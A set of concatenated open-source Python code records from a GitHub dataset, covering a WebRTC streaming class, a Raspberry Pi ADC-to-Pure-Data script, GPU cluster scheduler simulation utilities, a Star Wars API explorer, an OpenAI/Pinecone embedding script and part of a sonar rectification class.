loop.run_until_complete(self.participant.send_payload(payload))\n except Exception:\n pass\n\n def on_new_transceiver(self, el, trans):\n # trans.direction = GstWebRTC.WebRTCRTPTransceiverDirection.SENDONLY\n pass\n\n def handle_remote_ice_candidate(self, payload):\n ice = payload['ice']\n candidate = ice['candidate']\n sdpmlineindex = ice['sdpMLineIndex']\n self.webrtcbin.emit('add-ice-candidate', sdpmlineindex, candidate)\n\n def handle_answer(self, payload):\n sdp = payload['sdp']\n res, sdpmsg = GstSdp.SDPMessage.new()\n GstSdp.sdp_message_parse_buffer(bytes(sdp.encode()), sdpmsg)\n answer = GstWebRTC.WebRTCSessionDescription.new(GstWebRTC.WebRTCSDPType.ANSWER, sdpmsg)\n\n def did_set_remote_description(prom):\n pass\n\n promise = Gst.Promise.new_with_change_func(did_set_remote_description)\n self.webrtcbin.emit('set-remote-description', answer, promise)\n\n async def handle_payload(self, payload):\n action = payload['action']\n if action == 'ice_candidate':\n self.handle_remote_ice_candidate(payload)\n elif action == 'answer':\n self.handle_answer(payload)\n\n async def remove_from_pipeline(self, pipeline):\n try:\n if self.webrtcbin:\n for c in self.signal_connections:\n self.webrtcbin.disconnect(c)\n\n for (tee, tee_pad, el_pad) in self.tee_pad_links:\n tee_pad.unlink(el_pad)\n tee.release_request_pad(tee_pad)\n\n def set_to_null(element):\n element.set_state(Gst.State.NULL)\n\n def wait_for_null(element):\n (_, state, _) = element.get_state(0.1)\n tries = 0\n while state != Gst.State.NULL:\n tries += 1\n time.sleep(0.1)\n if tries == 3:\n break\n (_, state, _) = element.get_state(0.1)\n\n for e in self.elements:\n e.unlink(self.webrtcbin)\n t = threading.Thread(target=set_to_null, args=[e])\n t.start()\n wait_for_null(e)\n\n if self.webrtcbin:\n t = threading.Thread(target=set_to_null, args=[self.webrtcbin])\n t.start()\n wait_for_null(self.webrtcbin)\n\n for e in self.elements:\n self.pipeline.remove(e)\n\n if self.webrtcbin:\n pipeline.remove(self.webrtcbin)\n\n except Exception:\n pass\n\n async def cleanup(self):\n await self.participant.cleanup()\n","repo_name":"keepingitneil/gstreamer-example","sub_path":"sfu/webrtc_output.py","file_name":"webrtc_output.py","file_ext":"py","file_size_in_byte":7111,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"35853922363","text":"#!/usr/bin/python\n\nimport os # import os for sending messages to PD\nimport spidev # import the spidev module\nimport time # import time for the sleep function\nimport socket\n\n# Open SPI bus\nspi = spidev.SpiDev()\nspi.open(0,0)\nspi.max_speed_hz=1000000\n\nIP=\"127.0.0.1\"\nPORT=9000\naddr=(IP, PORT)\nEOL=';\\n'\nsock=socket.socket(socket.AF_INET, socket.SOCK_DGRAM) \n\ndef send2Pd(message=''):\n # Send a message to Pd\n msg = \"hello \" + message\n sock.sendto(msg+EOL, addr)\n\ndef readadc(channel):\n if channel > 7 or channel < 0:\n return -1\n\n # spi.xfer2 sends three bytes and returns three bytes:\n # byte 1: the start bit (always 0x01)\n # byte 2: configure bits, see MCP3008 datasheet table 5-2\n # byte 3: don't care\n r = spi.xfer2([1, 8 + channel << 4, 0])\n\n # Three bytes are returned; the data (0-1023) is in the\n # lower 3 bits of byte 2, and byte 3 (datasheet figure 6-1)\n v = ((r[1] & 3) << 8) + r[2]\n\n return v;\n\nwhile True:\n values = [0]*8\n for i in range(8):\n values[i] = readadc(i)\n message = str(i) + ' ' + str(values[i]) + ';' # make a string for use with Pdsend\n# print(message)\n send2Pd(message)\n# consider creating a message that has all values in one string rather than separate messages\n# print('| {0:>4} | {1:>4} | {2:>4} | {3:>4} | {4:>4} | {5:>4} | {6:>4} | {7:>4} |'.format(*values))\n time.sleep(0.2)\n","repo_name":"haigarmen/loppi","sub_path":"lop2osc.py","file_name":"lop2osc.py","file_ext":"py","file_size_in_byte":1420,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71462447593","text":"import profile\nimport sys\nimport os\nimport logging\nimport datetime\nimport pandas as pd\nfrom job import Job, Trace\nfrom policy import (\n ShortestJobFirst,\n FirstInFirstOut,\n ShortestRemainingTimeFirst,\n QuasiShortestServiceFirst,\n Lucid,\n Tiresias,\n)\nfrom profiler import LeastGPUFirstProfiler\n\nsys.path.append(\"..\")\n\nPROFILER_ENABLED_SCHEDULERS = [\"lucid\"]\n\n\ndef simulate_vc(trace, vc, placement, log_dir, policy, logger, start_ts, *args):\n if policy == \"sjf\":\n scheduler = ShortestJobFirst(trace, vc, placement, log_dir, logger, start_ts)\n elif policy == \"fifo\":\n scheduler = FirstInFirstOut(trace, vc, placement, log_dir, logger, start_ts)\n elif policy == \"srtf\":\n scheduler = ShortestRemainingTimeFirst(trace, vc, placement, log_dir, logger, start_ts)\n elif policy == \"qssf\":\n scheduler = QuasiShortestServiceFirst(trace, vc, placement, log_dir, logger, start_ts, args[0])\n elif policy == \"lucid\":\n scheduler = Lucid(trace, vc, placement, log_dir, logger, start_ts, args[0], args[1])\n elif policy == \"tiresias\":\n scheduler = Tiresias(trace, vc, placement, log_dir, logger, start_ts)\n scheduler.simulate()\n logger.info(f\"Finish {vc.vc_name}\")\n return True\n\n\ndef trace_profile(trace, scale, time_limit, profiler_factor, placement, log_dir, logger, start_ts):\n profiler = LeastGPUFirstProfiler(trace, scale, time_limit, profiler_factor, placement, log_dir, logger, start_ts)\n profiler.profile()\n trace.reset_trace()\n logger.info(\"Finish Profiling\")\n return trace\n\n\ndef get_available_schedulers():\n return [\"fifo\", \"sjf\", \"srtf\", \"qssf\", \"lucid\", \"tiresias\"]\n\n\ndef get_sweep_schedulers():\n return [\"fifo\", \"sjf\", \"srtf\", \"qssf\", \"tiresias\"]\n\n\ndef get_available_placers():\n return [\"random\", \"consolidate\", \"consolidateFirst\"]\n\n\ndef trace_process(dir, date_range, read_full):\n start = \"2020-04-01 00:00:00\"\n if read_full == False:\n df = pd.read_csv(\n dir + \"/cluster_log.csv\",\n parse_dates=[\"submit_time\"],\n usecols=[\"job_id\", \"user\", \"vc\", \"jobname\", \"gpu_num\", \"cpu_num\", \"state\", \"submit_time\", \"duration\"],\n )\n else:\n df = pd.read_csv(\n dir + \"/cluster_full_log.csv\",\n parse_dates=[\"submit_time\"],\n usecols=[\n \"job_id\",\n \"user\",\n \"vc\",\n \"jobname\",\n \"gpu_num\",\n \"cpu_num\",\n \"state\",\n \"submit_time\",\n \"duration\",\n \"dataset\",\n \"model\",\n \"batchsize\",\n \"amp\",\n \"speed\",\n \"gpu_util\",\n \"gmem_util\",\n \"gmem\",\n ],\n )\n # Consider gpu jobs only\n df = df[df[\"gpu_num\"] > 0]\n\n # VC filter\n vc_df = pd.read_csv(dir + \"/vc_config.csv\", index_col=0)\n vc_list = vc_df.index.to_list()\n df = df[df[\"vc\"].isin(vc_list)]\n\n df.sort_values(by=\"submit_time\", inplace=True)\n df = df[df[\"submit_time\"] >= pd.Timestamp(start)]\n df[\"submit_time\"] = df[\"submit_time\"].apply(lambda x: int(datetime.datetime.timestamp(pd.Timestamp(x))))\n\n # Normalizing\n df[\"submit_time\"] = df[\"submit_time\"] - df.iloc[0][\"submit_time\"]\n\n df[\"remain\"] = df[\"duration\"]\n df[[\"start_time\", \"end_time\"]] = sys.maxsize\n df[[\"ckpt_times\", \"queue\", \"jct\"]] = 0\n df[\"status\"] = None\n\n # Slicing simulation part\n begin = (pd.Timestamp(date_range[0]) - pd.Timestamp(start)).total_seconds()\n end = (pd.Timestamp(date_range[1]) - pd.Timestamp(start)).total_seconds()\n df = df[(df[\"submit_time\"] >= begin) & (df[\"submit_time\"] <= end)]\n\n df.sort_values(by=\"submit_time\", inplace=True)\n df.reset_index(inplace=True, drop=True)\n\n return df, begin\n\n\ndef trace_real_process(dir):\n df = pd.read_csv(\n dir + \"/cluster_full_log.csv\",\n parse_dates=[\"submit_time\"],\n usecols=[\n \"job_id\",\n \"user\",\n \"vc\",\n \"jobname\",\n \"gpu_num\",\n \"cpu_num\",\n \"state\",\n \"submit_time\",\n \"duration\",\n \"dataset\",\n \"model\",\n \"batchsize\",\n \"amp\",\n \"speed\",\n \"gpu_util\",\n \"gmem_util\",\n \"gmem\",\n ],\n )\n\n # VC filter\n vc_df = pd.read_csv(dir + \"/vc_config.csv\", index_col=0)\n vc_list = vc_df.index.to_list()\n df = df[df[\"vc\"].isin(vc_list)]\n\n df[\"remain\"] = df[\"duration\"]\n df[[\"start_time\", \"end_time\"]] = sys.maxsize\n df[[\"ckpt_times\", \"queue\", \"jct\"]] = 0\n df[\"status\"] = None\n df[\"submit_time\"] = df[\"submit_time\"].astype(float)\n df[\"submit_time\"] = df[\"submit_time\"].astype(int)\n df.reset_index(inplace=True, drop=True)\n\n return df, 0\n\n\ndef trace_pollux_process(dir, idx):\n df = pd.read_csv(\n f\"{dir}/cluster_full_log_{idx}.csv\",\n parse_dates=[\"submit_time\"],\n usecols=[\n \"job_id\",\n \"user\",\n \"vc\",\n \"jobname\",\n \"gpu_num\",\n \"cpu_num\",\n \"state\",\n \"submit_time\",\n \"duration\",\n \"dataset\",\n \"model\",\n \"batchsize\",\n \"amp\",\n \"speed\",\n \"gpu_util\",\n \"gmem_util\",\n \"gmem\",\n ],\n )\n\n # VC filter\n vc_df = pd.read_csv(dir + \"/vc_config.csv\", index_col=0)\n vc_list = vc_df.index.to_list()\n df = df[df[\"vc\"].isin(vc_list)]\n\n df[\"remain\"] = df[\"duration\"]\n df[[\"start_time\", \"end_time\"]] = sys.maxsize\n df[[\"ckpt_times\", \"queue\", \"jct\"]] = 0\n df[\"status\"] = None\n df[\"submit_time\"] = df[\"submit_time\"].astype(float)\n df[\"submit_time\"] = df[\"submit_time\"].astype(int)\n df.reset_index(inplace=True, drop=True)\n\n return df, 0\n\n\ndef trace_philly_process(dir, date_range, read_full):\n start = \"2017-10-01 00:00:00\"\n if read_full == False:\n df = pd.read_csv(\n dir + \"/cluster_log.csv\",\n parse_dates=[\"submit_time\"],\n usecols=[\"user\", \"vc\", \"jobname\", \"gpu_num\", \"state\", \"submit_time\", \"duration\"],\n )\n else:\n df = pd.read_csv(\n dir + \"/cluster_full_log.csv\",\n parse_dates=[\"submit_time\"],\n usecols=[\n \"user\",\n \"vc\",\n \"job_id\",\n \"gpu_num\",\n \"state\",\n \"submit_time\",\n \"duration\",\n \"dataset\",\n \"model\",\n \"batchsize\",\n \"amp\",\n \"speed\",\n \"gpu_util\",\n \"gmem_util\",\n \"gmem\",\n ],\n )\n # Consider gpu jobs only\n df = df[df[\"gpu_num\"] > 0]\n df.sort_values(by=\"submit_time\", inplace=True)\n # VC filter\n vc_df = pd.read_csv(dir + \"/vc_config.csv\", index_col=0)\n vc_list = vc_df.index.to_list()\n df = df[df[\"vc\"].isin(vc_list)]\n\n df = df[df[\"submit_time\"] >= pd.Timestamp(start)]\n df[\"submit_time\"] = df[\"submit_time\"].apply(lambda x: int(datetime.datetime.timestamp(pd.Timestamp(x))))\n\n df.rename(columns={\"jobname\": \"job_id\"}, inplace=True)\n df[\"state\"] = df[\"state\"].replace(\"Pass\", \"COMPLETED\")\n df[\"state\"] = df[\"state\"].replace(\"Failed\", \"FAILED\")\n df[\"state\"] = df[\"state\"].replace(\"Killed\", \"CANCELLED\")\n\n # Normalizing\n df[\"submit_time\"] = df[\"submit_time\"] - df.iloc[0][\"submit_time\"]\n\n df[\"remain\"] = df[\"duration\"]\n df[[\"start_time\", \"end_time\"]] = sys.maxsize\n df[[\"ckpt_times\", \"queue\", \"jct\"]] = 0\n df[\"status\"] = None\n\n # Slicing simulation part\n begin = (pd.Timestamp(date_range[0]) - pd.Timestamp(start)).total_seconds()\n end = (pd.Timestamp(date_range[1]) - pd.Timestamp(start)).total_seconds()\n df = df[(df[\"submit_time\"] >= begin) & (df[\"submit_time\"] <= end)]\n\n df.sort_values(by=\"submit_time\", inplace=True)\n df.reset_index(inplace=True, drop=True)\n\n return df, begin\n\n\ndef trace_parser(df):\n trace = Trace()\n\n for _, series in df.iterrows():\n trace.append_job(Job(series))\n trace.sort_jobs(\"submit_time\")\n return trace\n\n\ndef logger_init(file):\n logger = logging.getLogger()\n handler_file = logging.FileHandler(f\"{file}.log\", \"w\")\n handler_stream = logging.StreamHandler() # sys.stdout\n\n logger.setLevel(logging.INFO)\n handler_file.setLevel(logging.INFO)\n handler_stream.setLevel(logging.INFO)\n\n formatter = logging.Formatter(\"%(asctime)s | %(processName)s | %(message)s\", datefmt=\"%Y %b %d %H:%M:%S\")\n handler_file.setFormatter(formatter)\n handler_stream.setFormatter(formatter)\n\n logger.addHandler(handler_file)\n logger.addHandler(handler_stream)\n\n return logger\n\n\ndef cluster_concatenate(policy, placer, log_dir, dir):\n prefix = f\"{policy}_{placer}\"\n if not os.path.exists(log_dir + \"/all\"):\n os.mkdir(log_dir + \"/all\")\n\n vc_df = pd.read_csv(dir + \"/vc_config.csv\", index_col=0)\n vcs = vc_df.index.to_list()\n\n \"\"\"Log\"\"\"\n cluster_log = pd.DataFrame()\n for vc in vcs:\n vc_log = pd.read_csv(f\"{log_dir}/{vc}/{prefix}_{vc}_log.csv\")\n cluster_log = pd.concat([cluster_log, vc_log])\n cluster_log.sort_values(by=\"submit_time\", inplace=True)\n cluster_log.to_csv(f\"{log_dir}/all/{prefix}_all_log.csv\", index=False)\n\n \"\"\"Seq\"\"\"\n cluster_seq = pd.DataFrame()\n add_list = [\n \"total_gpu_num\",\n \"idle_gpu_num\",\n \"pending_gpu_num\",\n \"running_gpujob_num\",\n \"pending_gpujob_num\",\n \"pending_job_num_less_8\",\n \"total_node_num\",\n \"consolidate_node_num\",\n \"shared_node_num\",\n ]\n for vc in vcs:\n vc_seq = pd.read_csv(f\"{log_dir}/{vc}/{prefix}_{vc}_seq.csv\")\n if len(cluster_seq) == 0:\n cluster_seq = vc_seq\n continue\n cluster_seq[add_list] = cluster_seq[add_list] + vc_seq[add_list]\n cluster_seq.dropna(inplace=True)\n cluster_seq = cluster_seq.astype(int)\n cluster_seq[\"gpu_utilization\"] = (\n (cluster_seq[\"total_gpu_num\"] - cluster_seq[\"idle_gpu_num\"]) / cluster_seq[\"total_gpu_num\"]\n ).round(3)\n cluster_seq.to_csv(f\"{log_dir}/all/{prefix}_all_seq.csv\", index=False)\n\n\ndef cluster_analysis(placer, log_dir, dir):\n \"\"\"Generate Algorithm Comparsion CSV\"\"\"\n # ignore_warm_up = start_ts + 7*24*3600\n\n vc_df = pd.read_csv(dir + \"/vc_config.csv\", index_col=0)\n vcs = vc_df.index.to_list()\n vcs.append(\"all\")\n\n files = os.listdir(f\"{log_dir}/all\")\n prefix = set()\n for file in files:\n policy = file.split(\"_\")[0]\n placer = file.split(\"_\")[1]\n prefix.add(f\"{policy}_{placer}\")\n prefix_list = sorted(list(prefix))\n\n # prefix_list = []\n # for i in get_available_schedulers():\n # prefix = f\"{i}_{placer}\"\n # prefix_list.append(prefix)\n\n jct_avg = pd.DataFrame()\n que_avg = pd.DataFrame()\n for prefix in prefix_list:\n for vc in vcs:\n vc_log = pd.read_csv(f\"{log_dir}/{vc}/{prefix}_{vc}_log.csv\")\n # vc_log = vc_log[vc_log['submit_time'] > ignore_warm_up]\n jct_avg.at[vc, prefix] = vc_log[\"jct\"].mean()\n que_avg.at[vc, prefix] = vc_log[\"queue\"].mean()\n\n jct_avg = jct_avg.astype(int)\n que_avg = que_avg.astype(int)\n jct_avg.to_csv(f\"{log_dir}/jct_avg_{placer}.csv\")\n que_avg.to_csv(f\"{log_dir}/que_avg_{placer}.csv\")\n\n\ndef get_trace(experiment_name, trace_dir, read_full, idx=None):\n if \"Philly\" in experiment_name:\n trace_range = (\"2017-10-01 00:00:00\", \"2017-10-07 23:59:00\")\n trace_df, start_ts = trace_philly_process(trace_dir, trace_range, read_full)\n elif \"Pollux\" in experiment_name:\n trace_df, start_ts = trace_pollux_process(trace_dir, idx)\n else:\n if \"Sept\" in experiment_name:\n trace_range = (\"2020-09-01 00:00:00\", \"2020-09-26 23:59:00\")\n trace_df, start_ts = trace_process(trace_dir, trace_range, read_full)\n elif \"July\" in experiment_name:\n trace_range = (\"2020-07-01 00:00:00\", \"2020-07-31 23:59:00\")\n trace_df, start_ts = trace_process(trace_dir, trace_range, read_full)\n else:\n raise ValueError\n\n return trace_df, start_ts\n\n\ndef profiler_config(experiment_name, vc_dict):\n cluster = experiment_name.split(\"_\")[0]\n profile_scale = {\"Venus\": 2, \"Philly\": 2}\n profile_time = {\"Venus\": 200, \"Philly\": 80}\n profile_factor = {\"Venus\": 4, \"Philly\": 2}\n\n # Basic Config\n scale, time, factor = profile_scale[cluster], profile_time[cluster], profile_factor[cluster]\n if cluster == \"Philly\":\n vc_dict[\"philly\"] -= scale\n elif cluster == \"Venus\":\n vc_dict[\"vc8Gr\"] -= 1\n vc_dict[\"vcefl\"] -= 1\n # vc_dict[\"vcYVn\"] -= 1 # For elastic scaling\n return vc_dict, scale, time, factor\n\n\ndef check_profiler_scale_available(experiment_name, scale, vc_dict, prof_locate_vc=None):\n # Use only for debug\n default_vc = {\n \"Venus\": \"vc8Gr\",\n \"Saturn\": \"vcqdr\",\n \"Philly\": \"philly\",\n }\n cluster = experiment_name.split(\"_\")[0]\n\n if not prof_locate_vc:\n vc = default_vc[cluster]\n\n if scale <= vc_dict[vc]:\n return vc\n else:\n raise ValueError(\"Profile Node Scale Exceed VC Capacity\")\n\n\nif __name__ == \"__main__\":\n files = os.listdir(f\"log/Venus_Sept/all\")\n prefix = set()\n for file in files:\n policy = file.split(\"_\")[0]\n placer = file.split(\"_\")[1]\n prefix.add(f\"{policy}_{placer}\")\n prefix_list = sorted(list(prefix))\n print(prefix_list)\n","repo_name":"S-Lab-System-Group/Lucid","sub_path":"simulation/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":13644,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"72"} +{"seq_id":"27173800772","text":"import requests\nimport json\n\ndef getAllPages(url):\n \"\"\"\n When there are multiple pages pertaining to a single list of objects,\n this function loads in all of the pages and extends the list. For example,\n in swapi.co, there are 87 characters in the Star Wars universe. Because swapi.co\n only returns 10 items at a time, getAllPages makes 9 requests.\n \"\"\"\n done = False\n results = []\n while not done:\n # print(\"Requesting %s\" % (url))\n r = requests.get(url)\n page = json.loads(r.content)\n items = page[\"results\"]\n # print(\"Retrieved %d items\" % (len(items)))\n results += items\n if page[\"next\"]:\n url = page[\"next\"]\n else:\n done = True\n return results\n\ndef getItem(url):\n \"\"\"\n Returns any single item with a url as a dictionary.\n \"\"\"\n r = requests.get(url)\n item = json.loads(r.content)\n return item\n\ndef printItems(lst, key):\n \"\"\"\n Assigns sequential integers to each item in a list, printing the key attribute\n of each item.\n \"\"\"\n idx = 1\n for item in lst:\n print(\"%d. %s\" % (idx, item[key]))\n idx = idx + 1\n\ndef getItemList(urls, name):\n \"\"\"\n Requests each individual url, taking their responses and putting them in a list.\n It also prints an indexed list of the resources' name attributes.\n \"\"\"\n itemList = []\n for url in urls:\n item = getItem(url)\n itemList.append(item)\n printItems(itemList, name)\n return itemList\n\ndef printAttributes(item):\n \"\"\"\n Takes the non-list attributes of a dictionary and prints them out in a formatted\n manner. When printing the opening_crawl attribute of the \"film\" items, printAttributes\n adds extra newlines.\n \"\"\"\n for key in item:\n value = str(item[key])\n if key == 'opening_crawl':\n value = \"\\n\" + value + \"\\n\"\n if type(item[key]) is not list:\n print(\"%s: %s\" % (key.title(), value))\n\ndef promptForItem(items, swType):\n \"\"\"\n The innermost while loop of swexplore. It prompts the user to explore a different\n item or to return to a previous menu.\n \"\"\"\n done = False\n while not done:\n itemChoice = input(\"\\n==> Enter the number of a %s to explore, or select B to go back: \" % swType)\n print('')\n try:\n if itemChoice.lower() == 'b':\n done = True\n else:\n item = items[int(itemChoice) - 1]\n printAttributes(item)\n except:\n print('Invalid entry: ' + itemChoice + '. Try again!')\n","repo_name":"aaron-galper/apiproject","sub_path":"swfunc.py","file_name":"swfunc.py","file_ext":"py","file_size_in_byte":2590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30214283570","text":"import os\nimport pinecone\nimport argparse\nimport openai\nimport pandas as pd\nfrom pprint import pprint\n\n# Create an ArgumentParser object\nparser = argparse.ArgumentParser()\n\n# Add an argument with a flag and a name\nparser.add_argument(\"--file\", default=\"./output/default/contents.csv\", help=\"Specify the path to the CSV\")\nparser.add_argument(\"--embedding_type\", default=\"csv\", choices=[\"csv\", \"pinecone\"], help=\"Format to save embeddings in\")\nparser.add_argument(\"--out\", default=\"./output/default/embeddings.csv\", help=\"Specify the filename to save the embeddings\")\nparser.add_argument(\"--pinecone_mode\", default=\"replace\", choices=[\"upsert\", \"replace\"], help=\"Specify the mode to upsert or replace embeddings in Pinecone index\")\nparser.add_argument(\"--pinecone_index\", default=\"default\", help=\"Pinecone Index\")\nparser.add_argument(\"--pinecone_namespace\", default=\"content\", help=\"Pinecone Namespace\")\nargs = parser.parse_args()\n\nDOC_EMBEDDINGS_MODEL = \"text-embedding-ada-002\"\nEMBEDDING_BATCH_SIZE = 1000\nPINECONE_REGION=\"us-east1-gcp\"\nPINECONE_DIMENSION_SIZE=1536\nPINECONE_METRIC=\"euclidean\"\nPINECONE_POD_TYPE=\"p1\"\nPINECONE_BATCH_SIZE = 100\n\ndef load_content_dataframe(filename):\n df = pd.read_csv(filename)\n df = df.set_index([\"id\"])\n print(f\"{len(df)} rows in the data.\")\n\n # drop rows with empty content\n df = df.dropna(subset=[\"content\"])\n print(f\"{len(df)} rows with content.\")\n\n sampleSize = 5 if len(df) >=5 else len(df)\n sample = df.sample(sampleSize)\n print(\"Sample (5 rows)\", sample)\n return df\n\ndef get_embedding(text: str, model: str) -> list[float]:\n return openai.Embedding.create(\n model=model,\n input=text\n )\n\ndef get_doc_embedding(text: str) -> list[float]:\n result = get_embedding(text, DOC_EMBEDDINGS_MODEL)\n return result[\"data\"][0][\"embedding\"]\n\ndef compute_doc_embeddings_old(df: pd.DataFrame) -> dict[tuple[str], list[float]]:\n \"\"\"\n Create an embedding for each row in the dataframe using the OpenAI Embeddings API.\n \n Return a dictionary that maps between each embedding vector and the index of the row that it corresponds to.\n \"\"\"\n print('Generating the embeddings...')\n return {\n idx: get_doc_embedding(r.content.replace(\"\\n\", \" \")) if isinstance(r.content, str) else \"\"\n for idx, r in df.iterrows()\n }\n\ndef compute_doc_embeddings(df: pd.DataFrame) -> dict[tuple[str], list[float]]:\n \"\"\"\n Create an embedding for each row in the dataframe using the OpenAI Embeddings API.\n \n Return a dictionary that maps between each embedding vector and the index of the row that it corresponds to.\n \"\"\"\n print('Generating the embeddings...')\n results = {}\n batch_size = EMBEDDING_BATCH_SIZE\n processed = 0\n total = len(df)\n for i in range(0, total, batch_size):\n batch_rows = df[i:i+batch_size]\n batch_texts = [r.content.replace(\"\\n\", \" \") if isinstance(r.content, str) and r.content != \"\" else \"\" for _, r in batch_rows.iterrows()]\n batch_embeddings = get_embedding(batch_texts, DOC_EMBEDDINGS_MODEL)\n for idx, embedding in zip(batch_rows.index, batch_embeddings[\"data\"]):\n results[idx] = embedding[\"embedding\"]\n processed += batch_size\n print(f\"Processed embeddings for {processed}/{total} rows\")\n return results\n\n# Function to generate CSV from dataframe\ndef generate_csv_embeddings(embeddings_dict: dict[tuple[str], list[float]]):\n filename = args.out\n print('Saving file to CSV...')\n\n # Convert the context_embeddings dictionary to a list of tuples, where each tuple is of the form (id, embedding)\n context_embeddings_list = [(k,) + tuple(v)\n for k, v in embeddings_dict.items()]\n\n # Create a DataFrame from the list of tuples\n column_names = ['id'] + [i for i in range(len(list(embeddings_dict.values())[0]))]\n df = pd.DataFrame(context_embeddings_list, columns=column_names)\n\n # Save the DataFrame to a CSV file\n df.to_csv(filename, index=False)\n print(f\"Done! Saved to {filename}\")\n\ndef find_or_create_index(index_name:str, namespace:str, recreate_index:bool=False):\n try:\n # Check for index\n pinecone.describe_index(index_name)\n print(f\"Index `{index_name}` found...\")\n except pinecone.core.client.exceptions.NotFoundException as e:\n # Index was not found, create it\n print(f\"Index `{index_name}` does not exist, creating...\")\n pinecone.create_index(index_name, dimension=PINECONE_DIMENSION_SIZE, metric=PINECONE_METRIC, pod_type=PINECONE_POD_TYPE)\n print(f\"Index created!\")\n\n # Get the index \n index = pinecone.Index(index_name)\n \n # If the index has been found, check if we need to remake it\n if recreate_index:\n print('Deleting vectors in namespace...')\n index.delete(delete_all=True, namespace=namespace)\n print(f\"Done\")\n return index\n\ndef insert_vectors(index, vectors, mode):\n if mode == \"upsert\":\n index.upsert(vectors)\n elif mode == \"replace\":\n index.replace(vectors)\n else:\n raise ValueError(\"Invalid value for --mode argument, must be 'upsert' or 'replace'\")\n\n# Function to upsert the embeddings to Pinecone\ndef generate_pinecone_embeddings(embeddings_dict:dict[tuple[str], list[float]]):\n index_name = args.pinecone_index\n namespace = args.pinecone_namespace\n recreate_index = args.pinecone_mode == \"replace\"\n\n print(f\"Generating Pinecone embeddings for index:{index_name}...\")\n pinecone.init(api_key=os.environ.get('PINECONE_API_KEY'), environment=PINECONE_REGION)\n index = find_or_create_index(index_name, namespace, recreate_index)\n\n print('Inserting vectors...')\n vectors = []\n for i, (id, embedding) in enumerate(embeddings_dict.items()):\n vectors.append((id, embedding, {}))\n if (i + 1) % PINECONE_BATCH_SIZE == 0:\n index.upsert(vectors=vectors, namespace=namespace)\n vectors = []\n if vectors:\n index.upsert(vectors=vectors, namespace=namespace)\n\ndef main():\n content_df = load_content_dataframe(args.file)\n\n # Generate the embeddings\n embeddings_dict = compute_doc_embeddings(df=content_df)\n\n if args.embedding_type == 'csv':\n generate_csv_embeddings(embeddings_dict=embeddings_dict)\n elif args.embedding_type == 'pinecone':\n generate_pinecone_embeddings(embeddings_dict=embeddings_dict)\n\n print('All done!')\n# Entry point\nif __name__ == \"__main__\":\n main()","repo_name":"ht2/gpt_content_indexing","sub_path":"create_embeddings.py","file_name":"create_embeddings.py","file_ext":"py","file_size_in_byte":6476,"program_lang":"python","lang":"en","doc_type":"code","stars":42,"dataset":"github-code","pt":"72"} +{"seq_id":"217445372","text":"# Part of PING-Mapper software\r\n#\r\n# Co-Developed by Cameron S. Bodine and Dr. Daniel Buscombe\r\n#\r\n# Inspired by PyHum: https://github.com/dbuscombe-usgs/PyHum\r\n#\r\n# MIT License\r\n#\r\n# Copyright (c) 2022-23 Cameron S. Bodine\r\n#\r\n# Permission is hereby granted, free of charge, to any person obtaining a copy\r\n# of this software and associated documentation files (the \"Software\"), to deal\r\n# in the Software without restriction, including without limitation the rights\r\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\r\n# copies of the Software, and to permit persons to whom the Software is\r\n# furnished to do so, subject to the following conditions:\r\n#\r\n# The above copyright notice and this permission notice shall be included in all\r\n# copies or substantial portions of the Software.\r\n#\r\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\r\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\r\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\r\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\r\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\r\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\r\n# SOFTWARE.\r\n\r\n\r\nfrom funcs_common import *\r\nfrom class_sonObj import sonObj\r\nfrom scipy.interpolate import splprep, splev\r\nfrom skimage.transform import PiecewiseAffineTransform, warp\r\nfrom rasterio.transform import from_origin\r\nfrom rasterio.enums import Resampling\r\nfrom PIL import Image\r\n\r\nfrom matplotlib import cm\r\n\r\nclass rectObj(sonObj):\r\n '''\r\n Python child class of sonObj() to store everything related to georectification\r\n of imagery from Humminbird sonar recordings. Since this is a child class of\r\n sonObj(), all attributes and functions provided in sonObj() are available to\r\n a rectObj() instance.\r\n\r\n ----------------\r\n Class Attributes\r\n ----------------\r\n * Alphabetical order *\r\n self.rangeExt : DataFrame\r\n DESCRIPTION - Pandas dataframe to store range extent.\r\n\r\n self.rect_wcr : bool\r\n DESCRIPTION - Flag indicating if rectified wcr data was exported.\r\n\r\n self.rect_wcp : bool\r\n DESCRIPTION - Flag indicating if rectified wcp data was exported.\r\n\r\n self.smthTrk : DataFrame\r\n DESCRIPTION - Pandas dataframe to store smoothed trackline.\r\n '''\r\n\r\n ############################################################################\r\n # Create rectObj() instance from previously created sonObj() instance #\r\n ############################################################################\r\n\r\n #=======================================================================\r\n def __init__(self,\r\n metaFile):\r\n '''\r\n Initialize an empty rectObj() class, child of sonObj() class. All sonObj()\r\n parameters initialized to `None` so that they can be loaded from a\r\n previously created pickle file.\r\n\r\n ----------\r\n Parameters\r\n ----------\r\n metaFile : str\r\n DESCRIPTION - Path to pickled sonObj() file containing sonObj() attribute\r\n values.\r\n EXAMPLE - metaFile = './PINGMapperTest/meta/B002_ss_port_meta.meta'\r\n\r\n -------\r\n Returns\r\n -------\r\n rectObj instance with sonObj attributes loaded.\r\n '''\r\n sonObj.__init__(self, sonFile=None, humFile=None, projDir=None, tempC=None, nchunk=None)\r\n\r\n metaFile = pickle.load(open(metaFile, 'rb')) # Load sonObj() pickle file into memory\r\n\r\n for attr, value in metaFile.__dict__.items(): # Store sonObj() attributes in self\r\n setattr(self, attr, value)\r\n\r\n if not hasattr(self, 'rect_wcp'):\r\n self.rect_wcp = False\r\n\r\n if not hasattr(self, 'rect_wcr'):\r\n self.rect_wcr = 